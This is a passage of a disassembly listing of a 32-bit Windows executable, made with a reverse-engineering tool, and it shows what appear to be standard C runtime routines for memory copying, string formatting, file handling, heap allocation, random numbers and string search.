; sub_40164F+14�p ...
xor eax, eax
push eax
push eax
push eax
push eax
push eax
call sub_402F39
add esp, 14h
retn
sub_402F5D endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402F6D proc near ; CODE XREF: sub_401043+16�p
; sub_4010C5+10�p ...
jmp sub_403603
sub_402F6D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402F72 proc near ; CODE XREF: sub_401000+F�p
; sub_403B22+84�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_C]
push edi
xor edi, edi
cmp esi, edi
jnz short loc_402F84
loc_402F80: ; CODE XREF: sub_402F72+4B�j
xor eax, eax
jmp short loc_402FE9
; ---------------------------------------------------------------------------
loc_402F84: ; CODE XREF: sub_402F72+C�j
cmp [ebp+arg_0], edi
jnz short loc_402FA4
loc_402F89: ; CODE XREF: sub_402F72+5F�j
call sub_4057D3
push 16h
pop esi
mov [eax], esi
loc_402F93: ; CODE XREF: sub_402F72+72�j
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
mov eax, esi
jmp short loc_402FE9
; ---------------------------------------------------------------------------
loc_402FA4: ; CODE XREF: sub_402F72+15�j
cmp [ebp+arg_8], edi
jz short loc_402FBF
cmp [ebp+arg_4], esi
jb short loc_402FBF
push esi
push [ebp+arg_8]
push [ebp+arg_0]
call sub_407BF0
add esp, 0Ch
jmp short loc_402F80
; ---------------------------------------------------------------------------
loc_402FBF: ; CODE XREF: sub_402F72+35�j
; sub_402F72+3A�j
push [ebp+arg_4]
push edi
push [ebp+arg_0]
call sub_407B70
add esp, 0Ch
cmp [ebp+arg_8], edi
jz short loc_402F89
cmp [ebp+arg_4], esi
jnb short loc_402FE6
call sub_4057D3
push 22h
pop ecx
mov [eax], ecx
mov esi, ecx
jmp short loc_402F93
; ---------------------------------------------------------------------------
loc_402FE6: ; CODE XREF: sub_402F72+64�j
push 16h
pop eax
loc_402FE9: ; CODE XREF: sub_402F72+10�j
; sub_402F72+30�j
pop edi
pop esi
pop ebp
retn
sub_402F72 endp
; =============== S U B R O U T I N E =======================================
sub_402FED proc near ; CODE XREF: sub_402FFB+3�p
push ecx
mov dword ptr [ecx], offset off_41D38C
call sub_407F55
pop ecx
retn
sub_402FED endp
; =============== S U B R O U T I N E =======================================
sub_402FFB proc near ; DATA XREF: .rdata:off_41D38C�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_402FED
test [esp+4+arg_0], 1
jz short loc_403011
push esi
call sub_402F6D
pop ecx
loc_403011: ; CODE XREF: sub_402FFB+D�j
mov eax, esi
pop esi
retn 4
sub_402FFB endp
; =============== S U B R O U T I N E =======================================
sub_403017 proc near ; CODE XREF: sub_40BA07+12D�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
add ecx, 9
push ecx
add eax, 9
push eax
call sub_407FD0
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
retn 4
sub_403017 endp
; =============== S U B R O U T I N E =======================================
sub_403032 proc near ; CODE XREF: sub_40304B+3B�p
push esi
push 1
push offset off_423048
mov esi, ecx
call sub_402C5A
mov dword ptr [esi], offset off_41D314
mov eax, esi
pop esi
retn
sub_403032 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40304B proc near ; CODE XREF: sub_401291+5�p
; sub_401395+5�p ...
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
jmp short loc_403060
; ---------------------------------------------------------------------------
loc_403053: ; CODE XREF: sub_40304B+20�j
push [ebp+arg_0]
call sub_408062
test eax, eax
pop ecx
jz short loc_40306F
loc_403060: ; CODE XREF: sub_40304B+6�j
push [ebp+arg_0]
call sub_4036E0
test eax, eax
pop ecx
jz short loc_403053
leave
retn
; ---------------------------------------------------------------------------
loc_40306F: ; CODE XREF: sub_40304B+13�j
test byte ptr dword_425A90, 1
mov esi, offset dword_425A84
jnz short loc_403096
or dword_425A90, 1
mov ecx, esi
call sub_403032
push offset loc_41C52A
call sub_402E21
pop ecx
loc_403096: ; CODE XREF: sub_40304B+30�j
push esi
lea ecx, [ebp+var_C]
call sub_402C72
push offset dword_4219C0
lea eax, [ebp+var_C]
push eax
mov [ebp+var_C], offset off_41D314
call sub_4041BB
int 3 ; Trap to Debugger
sub_40304B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4030B5 proc near ; CODE XREF: sub_4190BD+84�p
; sub_4190BD+102�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push ebx
xor ebx, ebx
cmp [ebp+arg_4], ebx
jnz short loc_4030E0
loc_4030C3: ; CODE XREF: sub_4030B5+30�j
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_40312D
; ---------------------------------------------------------------------------
loc_4030E0: ; CODE XREF: sub_4030B5+C�j
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_4030C3
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
lea eax, [ebp+arg_8]
push eax
push ebx
push [ebp+arg_4]
lea eax, [ebp+var_20]
push eax
mov [ebp+var_1C], 7FFFFFFFh
mov [ebp+var_14], 42h
call sub_4069D7
add esp, 10h
dec [ebp+var_1C]
mov esi, eax
js short loc_40311E
mov eax, [ebp+var_20]
mov [eax], bl
jmp short loc_40312A
; ---------------------------------------------------------------------------
loc_40311E: ; CODE XREF: sub_4030B5+60�j
lea eax, [ebp+var_20]
push eax
push ebx
call sub_4067D6
pop ecx
pop ecx
loc_40312A: ; CODE XREF: sub_4030B5+67�j
mov eax, esi
pop esi
loc_40312D: ; CODE XREF: sub_4030B5+29�j
pop ebx
leave
retn
sub_4030B5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403130 proc near ; CODE XREF: sub_4031F4+A�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 0Ch
push offset dword_421348
call __SEH_prolog4
xor ebx, ebx
mov [ebp+var_1C], ebx
xor eax, eax
mov edi, [ebp+arg_0]
cmp edi, ebx
setnz al
cmp eax, ebx
jnz short loc_40316B
loc_40314F: ; CODE XREF: sub_403130+47�j
; sub_403130+52�j
call sub_4057D3
mov dword ptr [eax], 16h
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402F39
add esp, 14h
loc_403167: ; CODE XREF: sub_403130+6B�j
; sub_403130+92�j
xor eax, eax
jmp short loc_4031E4
; ---------------------------------------------------------------------------
loc_40316B: ; CODE XREF: sub_403130+1D�j
xor eax, eax
mov esi, [ebp+arg_4]
cmp esi, ebx
setnz al
cmp eax, ebx
jz short loc_40314F
xor eax, eax
cmp [esi], bl
setnz al
cmp eax, ebx
jz short loc_40314F
call sub_4084A1
mov [ebp+arg_0], eax
cmp eax, ebx
jnz short loc_40319D
call sub_4057D3
mov dword ptr [eax], 18h
jmp short loc_403167
; ---------------------------------------------------------------------------
loc_40319D: ; CODE XREF: sub_403130+5E�j
mov [ebp+ms_exc.disabled], ebx
cmp [edi], bl
jnz short loc_4031C4
call sub_4057D3
mov dword ptr [eax], 16h
push 0FFFFFFFEh
lea eax, [ebp+ms_exc.prev_er]
push eax
push offset dword_423064
call sub_4085C8
add esp, 0Ch
jmp short loc_403167
; ---------------------------------------------------------------------------
loc_4031C4: ; CODE XREF: sub_403130+72�j
push eax
push [ebp+arg_8]
push esi
push edi
call sub_4081FF
add esp, 10h
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4031EA
mov eax, [ebp+var_1C]
loc_4031E4: ; CODE XREF: sub_403130+39�j
call __SEH_epilog4
retn
sub_403130 endp
; =============== S U B R O U T I N E =======================================
sub_4031EA proc near ; CODE XREF: sub_403130+AC�p
; DATA XREF: .rdata:00421360�o
push dword ptr [ebp+8]
call sub_4081AD
pop ecx
retn
sub_4031EA endp
; =============== S U B R O U T I N E =======================================
sub_4031F4 proc near ; CODE XREF: sub_4190BD+116�p
; sub_41B3D0+4E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 40h
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_403130
add esp, 0Ch
retn
sub_4031F4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403207 proc near ; CODE XREF: sub_4190BD+131�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push 0Ch
push offset dword_421368
call __SEH_prolog4
xor ebx, ebx
mov [ebp+var_1C], ebx
xor eax, eax
mov esi, [ebp+arg_0]
cmp esi, ebx
setnz al
cmp eax, ebx
jnz short loc_403246
loc_403226: ; CODE XREF: sub_403207+49�j
call sub_4057D3
mov dword ptr [eax], 16h
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp loc_403346
; ---------------------------------------------------------------------------
loc_403246: ; CODE XREF: sub_403207+1D�j
xor eax, eax
cmp [ebp+arg_4], ebx
setnz al
cmp eax, ebx
jz short loc_403226
mov [ebp+arg_0], esi
push esi
call sub_40815B
pop ecx
mov [ebp+ms_exc.disabled], ebx
test byte ptr [esi+0Ch], 40h
jnz loc_40330F
push esi
call sub_408A20
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_4032A3
push esi
call sub_408A20
pop ecx
cmp eax, 0FFFFFFFEh
jz short loc_4032A3
push esi
call sub_408A20
sar eax, 5
lea edi, ds:433CA0h[eax*4]
push esi
call sub_408A20
pop ecx
pop ecx
and eax, 1Fh
imul eax, 28h
add eax, [edi]
jmp short loc_4032A8
; ---------------------------------------------------------------------------
loc_4032A3: ; CODE XREF: sub_403207+6C�j
; sub_403207+78�j
mov eax, offset dword_423BD0
loc_4032A8: ; CODE XREF: sub_403207+9A�j
test byte ptr [eax+24h], 7Fh
jnz short loc_4032F3
push esi
call sub_408A20
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_4032E8
push esi
call sub_408A20
pop ecx
cmp eax, 0FFFFFFFEh
jz short loc_4032E8
push esi
call sub_408A20
sar eax, 5
lea edi, ds:433CA0h[eax*4]
push esi
call sub_408A20
pop ecx
pop ecx
and eax, 1Fh
imul eax, 28h
add eax, [edi]
jmp short loc_4032ED
; ---------------------------------------------------------------------------
loc_4032E8: ; CODE XREF: sub_403207+B1�j
; sub_403207+BD�j
mov eax, offset dword_423BD0
loc_4032ED: ; CODE XREF: sub_403207+DF�j
test byte ptr [eax+24h], 80h
jz short loc_40330F
loc_4032F3: ; CODE XREF: sub_403207+A5�j
call sub_4057D3
mov dword ptr [eax], 16h
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402F39
add esp, 14h
or [ebp+var_1C], 0FFFFFFFFh
loc_40330F: ; CODE XREF: sub_403207+5C�j
; sub_403207+EA�j
cmp [ebp+var_1C], ebx
jnz short loc_403337
push esi
call sub_40871B
mov edi, eax
lea eax, [ebp+arg_8]
push eax
push ebx
push [ebp+arg_4]
push esi
call sub_4069D7
mov [ebp+var_1C], eax
push esi
push edi
call sub_4087B1
add esp, 1Ch
loc_403337: ; CODE XREF: sub_403207+10B�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40334C
mov eax, [ebp+var_1C]
loc_403346: ; CODE XREF: sub_403207+3A�j
call __SEH_epilog4
retn
sub_403207 endp
; =============== S U B R O U T I N E =======================================
sub_40334C proc near ; CODE XREF: sub_403207+137�p
; DATA XREF: .rdata:00421380�o
push dword ptr [ebp+8]
call sub_4081AD
pop ecx
retn
sub_40334C endp
; =============== S U B R O U T I N E =======================================
sub_403356 proc near ; CODE XREF: sub_41748B+4F�p
; sub_41A9DE+20F�p
arg_0 = dword ptr 4
call sub_40539D
mov ecx, [esp+arg_0]
mov [eax+14h], ecx
retn
sub_403356 endp
; =============== S U B R O U T I N E =======================================
sub_403363 proc near ; CODE XREF: sub_41748B:loc_417607�p
; sub_4190BD+A7�p ...
call sub_40539D
mov ecx, [eax+14h]
imul ecx, 343FDh
add ecx, 269EC3h
mov [eax+14h], ecx
mov eax, ecx
shr eax, 10h
and eax, 7FFFh
retn
sub_403363 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403385 proc near ; CODE XREF: sub_403436+12�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 20h
push ebx
xor ebx, ebx
cmp [ebp+arg_8], ebx
jnz short loc_4033B3
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp loc_403433
; ---------------------------------------------------------------------------
loc_4033B3: ; CODE XREF: sub_403385+C�j
mov ecx, [ebp+arg_4]
cmp ecx, ebx
push esi
mov esi, [ebp+arg_0]
jz short loc_4033DF
cmp esi, ebx
jnz short loc_4033DF
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_403432
; ---------------------------------------------------------------------------
loc_4033DF: ; CODE XREF: sub_403385+37�j
; sub_403385+3B�j
mov eax, 7FFFFFFFh
cmp ecx, eax
mov [ebp+var_1C], eax
ja short loc_4033EE
mov [ebp+var_1C], ecx
loc_4033EE: ; CODE XREF: sub_403385+64�j
push edi
push [ebp+arg_10]
lea eax, [ebp+var_20]
push [ebp+arg_C]
mov [ebp+var_14], 42h
push [ebp+arg_8]
mov [ebp+var_18], esi
push eax
mov [ebp+var_20], esi
call sub_4069D7
add esp, 10h
cmp esi, ebx
mov edi, eax
jz short loc_403431
dec [ebp+var_1C]
js short loc_403423
mov eax, [ebp+var_20]
mov [eax], bl
jmp short loc_40342F
; ---------------------------------------------------------------------------
loc_403423: ; CODE XREF: sub_403385+95�j
lea eax, [ebp+var_20]
push eax
push ebx
call sub_4067D6
pop ecx
pop ecx
loc_40342F: ; CODE XREF: sub_403385+9C�j
mov eax, edi
loc_403431: ; CODE XREF: sub_403385+90�j
pop edi
loc_403432: ; CODE XREF: sub_403385+58�j
pop esi
loc_403433: ; CODE XREF: sub_403385+29�j
pop ebx
leave
retn
sub_403385 endp
; =============== S U B R O U T I N E =======================================
sub_403436 proc near ; CODE XREF: sub_4172CC+3E�p
; sub_417361+7C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push [esp+arg_C]
push 0
push [esp+8+arg_8]
push [esp+0Ch+arg_4]
push [esp+10h+arg_0]
call sub_403385
add esp, 14h
retn
sub_403436 endp
; =============== S U B R O U T I N E =======================================
sub_403451 proc near ; CODE XREF: sub_4034C4+5A�p
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
xor edi, edi
or ebx, 0FFFFFFFFh
cmp esi, edi
jnz short loc_40347E
call sub_4057D3
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_4034C0
; ---------------------------------------------------------------------------
loc_40347E: ; CODE XREF: sub_403451+E�j
test byte ptr [esi+0Ch], 83h
jz short loc_4034BB
push esi
call sub_408BDA
push esi
mov ebx, eax
call sub_408BAE
push esi
call sub_408A20
push eax
call sub_408AE1
add esp, 10h
test eax, eax
jge short loc_4034AA
or ebx, 0FFFFFFFFh
jmp short loc_4034BB
; ---------------------------------------------------------------------------
loc_4034AA: ; CODE XREF: sub_403451+52�j
mov eax, [esi+1Ch]
cmp eax, edi
jz short loc_4034BB
push eax
call sub_403603
pop ecx
mov [esi+1Ch], edi
loc_4034BB: ; CODE XREF: sub_403451+31�j
; sub_403451+57�j ...
mov [esi+0Ch], edi
mov eax, ebx
loc_4034C0: ; CODE XREF: sub_403451+2B�j
pop edi
pop esi
pop ebx
retn
sub_403451 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4034C4 proc near ; CODE XREF: sub_40DFD3+43�p
; sub_4190BD+137�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset dword_421388
call __SEH_prolog4
or [ebp+var_1C], 0FFFFFFFFh
xor eax, eax
mov esi, [ebp+arg_0]
xor edi, edi
cmp esi, edi
setnz al
cmp eax, edi
jnz short loc_403501
call sub_4057D3
mov dword ptr [eax], 16h
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_40350D
; ---------------------------------------------------------------------------
loc_403501: ; CODE XREF: sub_4034C4+1E�j
test byte ptr [esi+0Ch], 40h
jz short loc_403513
mov [esi+0Ch], edi
loc_40350A: ; CODE XREF: sub_4034C4+6F�j
mov eax, [ebp+var_1C]
loc_40350D: ; CODE XREF: sub_4034C4+3B�j
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_403513: ; CODE XREF: sub_4034C4+41�j
push esi
call sub_40815B
pop ecx
mov [ebp+ms_exc.disabled], edi
push esi
call sub_403451
pop ecx
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_403538
jmp short loc_40350A
sub_4034C4 endp
; =============== S U B R O U T I N E =======================================
sub_403535 proc near ; DATA XREF: .rdata:004213A0�o
mov esi, [ebp+8]
sub_403535 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_403538 proc near ; CODE XREF: sub_4034C4+6A�p
push esi
call sub_4081AD
pop ecx
retn
sub_403538 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403540 proc near ; CODE XREF: .text:004192C0�p
; sub_4192FB+13�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
lea eax, [ebp+var_8]
push eax
call ds:dword_41D1A0 ; GetSystemTimeAsFileTime
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
push 0
add eax, 2AC18000h
push 989680h
adc ecx, 0FE624E21h
push ecx
push eax
call sub_408D70
mov ecx, [ebp+arg_0]
test ecx, ecx
jz short locret_40357A
mov [ecx], eax
mov [ecx+4], edx
locret_40357A: ; CODE XREF: sub_403540+33�j
leave
retn
sub_403540 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40357C proc near ; CODE XREF: sub_4035E4+15�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
push edi
push esi
call sub_404130
xor edi, edi
cmp esi, edi
pop ecx
jnz short loc_4035AD
loc_403590: ; CODE XREF: sub_40357C+34�j
call sub_4057D3
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp short loc_4035E1
; ---------------------------------------------------------------------------
loc_4035AD: ; CODE XREF: sub_40357C+12�j
cmp [ebp+arg_4], edi
jz short loc_403590
mov ecx, 7FFFFFFFh
cmp eax, ecx
mov [ebp+var_14], 49h
mov [ebp+var_18], esi
mov [ebp+var_20], esi
mov [ebp+var_1C], ecx
ja short loc_4035CE
mov [ebp+var_1C], eax
loc_4035CE: ; CODE XREF: sub_40357C+4D�j
push [ebp+arg_C]
lea eax, [ebp+var_20]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call [ebp+arg_0]
add esp, 10h
loc_4035E1: ; CODE XREF: sub_40357C+2F�j
pop edi
leave
retn
sub_40357C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4035E4 proc near ; CODE XREF: sub_401F1C+22E�p
; sub_401F1C+36B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
lea eax, [esp+4+arg_8]
push eax
push 0
push [esp+0Ch+arg_4]
push offset sub_408E67
call sub_40357C
add esp, 10h
pop esi
retn
sub_4035E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403603 proc near ; CODE XREF: sub_402CCA+F�p sub_402F6D�j ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00403662 SIZE 0000002F BYTES
push 0Ch
push offset dword_4213A8
call __SEH_prolog4
mov esi, [ebp+arg_0]
test esi, esi
jz short loc_40368B
cmp dword_434DF4, 3
jnz short loc_403662
push 4
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_405B25
pop ecx
mov [ebp+var_1C], eax
test eax, eax
jz short loc_403642
push esi
push eax
call sub_405B50
pop ecx
pop ecx
loc_403642: ; CODE XREF: sub_403603+34�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_403659
cmp [ebp+var_1C], 0
jnz short loc_40368B
push [ebp+arg_0]
jmp short loc_403663
sub_403603 endp
; =============== S U B R O U T I N E =======================================
sub_403659 proc near ; CODE XREF: sub_403603+46�p
; DATA XREF: .rdata:004213C0�o
push 4
call sub_40591F
pop ecx
retn
sub_403659 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_403603
loc_403662: ; CODE XREF: sub_403603+1A�j
push esi
loc_403663: ; CODE XREF: sub_403603+54�j
push 0
push dword_425F68
call ds:dword_41D10C ; RtlFreeHeap
test eax, eax
jnz short loc_40368B
call sub_4057D3
mov esi, eax
call ds:dword_41D0F0 ; RtlGetLastWin32Error
push eax
call sub_405798
mov [esi], eax
pop ecx
loc_40368B: ; CODE XREF: sub_403603+11�j
; sub_403603+4F�j ...
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_403603
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403691 proc near ; CODE XREF: sub_4036E0+59�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset dword_4213C8
call __SEH_prolog4
and [ebp+var_1C], 0
mov esi, [ebp+arg_0]
cmp esi, dword_434DE4
ja short loc_4036CE
push 4
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_4062F9
pop ecx
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4036D7
loc_4036CE: ; CODE XREF: sub_403691+19�j
mov eax, [ebp+var_1C]
call __SEH_epilog4
retn
sub_403691 endp
; =============== S U B R O U T I N E =======================================
sub_4036D7 proc near ; CODE XREF: sub_403691+38�p
; DATA XREF: .rdata:004213E0�o
push 4
call sub_40591F
pop ecx
retn
sub_4036D7 endp
; =============== S U B R O U T I N E =======================================
sub_4036E0 proc near ; CODE XREF: sub_402C0C+1F�p
; sub_402C72+2A�p ...
arg_0 = dword ptr 4
push ebp
mov ebp, [esp+4+arg_0]
cmp ebp, 0FFFFFFE0h
ja loc_40378D
push ebx
mov ebx, ds:dword_41D114
push esi
push edi
loc_4036F7: ; CODE XREF: sub_4036E0+94�j
xor esi, esi
cmp dword_425F68, esi
mov edi, ebp
jnz short loc_40371B
call sub_409C54
push 1Eh
call sub_409AB4
push 0FFh
call sub_4078A7
pop ecx
pop ecx
loc_40371B: ; CODE XREF: sub_4036E0+21�j
mov eax, dword_434DF4
cmp eax, 1
jnz short loc_403733
cmp ebp, esi
jz short loc_40372D
mov eax, ebp
jmp short loc_403730
; ---------------------------------------------------------------------------
loc_40372D: ; CODE XREF: sub_4036E0+47�j
xor eax, eax
inc eax
loc_403730: ; CODE XREF: sub_4036E0+4B�j
push eax
jmp short loc_403751
; ---------------------------------------------------------------------------
loc_403733: ; CODE XREF: sub_4036E0+43�j
cmp eax, 3
jnz short loc_403743
push ebp
call sub_403691
cmp eax, esi
pop ecx
jnz short loc_40375A
loc_403743: ; CODE XREF: sub_4036E0+56�j
cmp ebp, esi
jnz short loc_40374A
xor edi, edi
inc edi
loc_40374A: ; CODE XREF: sub_4036E0+65�j
add edi, 0Fh
and edi, 0FFFFFFF0h
push edi
loc_403751: ; CODE XREF: sub_4036E0+51�j
push esi
push dword_425F68
call ebx ; RtlAllocateHeap
loc_40375A: ; CODE XREF: sub_4036E0+61�j
mov esi, eax
test esi, esi
jnz short loc_403786
cmp dword_4262EC, eax
push 0Ch
pop edi
jz short loc_403778
push ebp
call sub_408062
test eax, eax
pop ecx
jnz short loc_4036F7
jmp short loc_40377F
; ---------------------------------------------------------------------------
loc_403778: ; CODE XREF: sub_4036E0+89�j
call sub_4057D3
mov [eax], edi
loc_40377F: ; CODE XREF: sub_4036E0+96�j
call sub_4057D3
mov [eax], edi
loc_403786: ; CODE XREF: sub_4036E0+7E�j
pop edi
mov eax, esi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40378D: ; CODE XREF: sub_4036E0+8�j
push ebp
call sub_408062
pop ecx
call sub_4057D3
mov dword ptr [eax], 0Ch
xor eax, eax
pop ebp
retn
sub_4036E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4037B0 proc near ; CODE XREF: sub_41783D+84�p
; sub_4184BF+1B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_403830
mov dh, [ecx+1]
test dh, dh
jz short loc_40381D
loc_4037C8: ; CODE XREF: sub_4037B0+58�j
; sub_4037B0+6B�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
add esi, 1
cmp al, dl
jz short loc_4037EE
test al, al
jz short loc_4037E8
loc_4037DB: ; CODE XREF: sub_4037B0+36�j
mov al, [esi]
add esi, 1
loc_4037E0: ; CODE XREF: sub_4037B0+45�j
cmp al, dl
jz short loc_4037EE
test al, al
jnz short loc_4037DB
loc_4037E8: ; CODE XREF: sub_4037B0+29�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4037EE: ; CODE XREF: sub_4037B0+25�j
; sub_4037B0+32�j
mov al, [esi]
add esi, 1
cmp al, dh
jnz short loc_4037E0
lea edi, [esi-1]
loc_4037FA: ; CODE XREF: sub_4037B0+69�j
mov ah, [ecx+2]
test ah, ah
jz short loc_403829
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_4037C8
mov al, [ecx+3]
test al, al
jz short loc_403829
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_4037FA
jmp short loc_4037C8
; ---------------------------------------------------------------------------
loc_40381D: ; CODE XREF: sub_4037B0+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp loc_403856
; ---------------------------------------------------------------------------
loc_403829: ; CODE XREF: sub_4037B0+4F�j
; sub_4037B0+5F�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_403830: ; CODE XREF: sub_4037B0+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_4037B0 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_403850
loc_403840: ; CODE XREF: sub_403850+1F�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_403850
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403850 proc near ; CODE XREF: sub_41837F+B�p
; sub_418396+35�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 00403840 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
loc_403856: ; CODE XREF: sub_4037B0+74�j
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_40387D
loc_403868: ; CODE XREF: sub_403850+2B�j
mov cl, [edx]
add edx, 1
cmp cl, bl
jz short loc_403840
test cl, cl
jz short loc_4038C6
test edx, 3
jnz short loc_403868
loc_40387D: ; CODE XREF: sub_403850+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_403888: ; CODE XREF: sub_403850+63�j
; sub_403850+72�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_4038CA
and eax, 81010100h
jz short loc_403888
and eax, 1010100h
jnz short loc_4038C4
and esi, 80000000h
jnz short loc_403888
loc_4038C4: ; CODE XREF: sub_403850+6A�j
; sub_403850+83�j ...
pop esi
pop edi
loc_4038C6: ; CODE XREF: sub_403850+23�j
pop ebx
xor eax, eax
retn
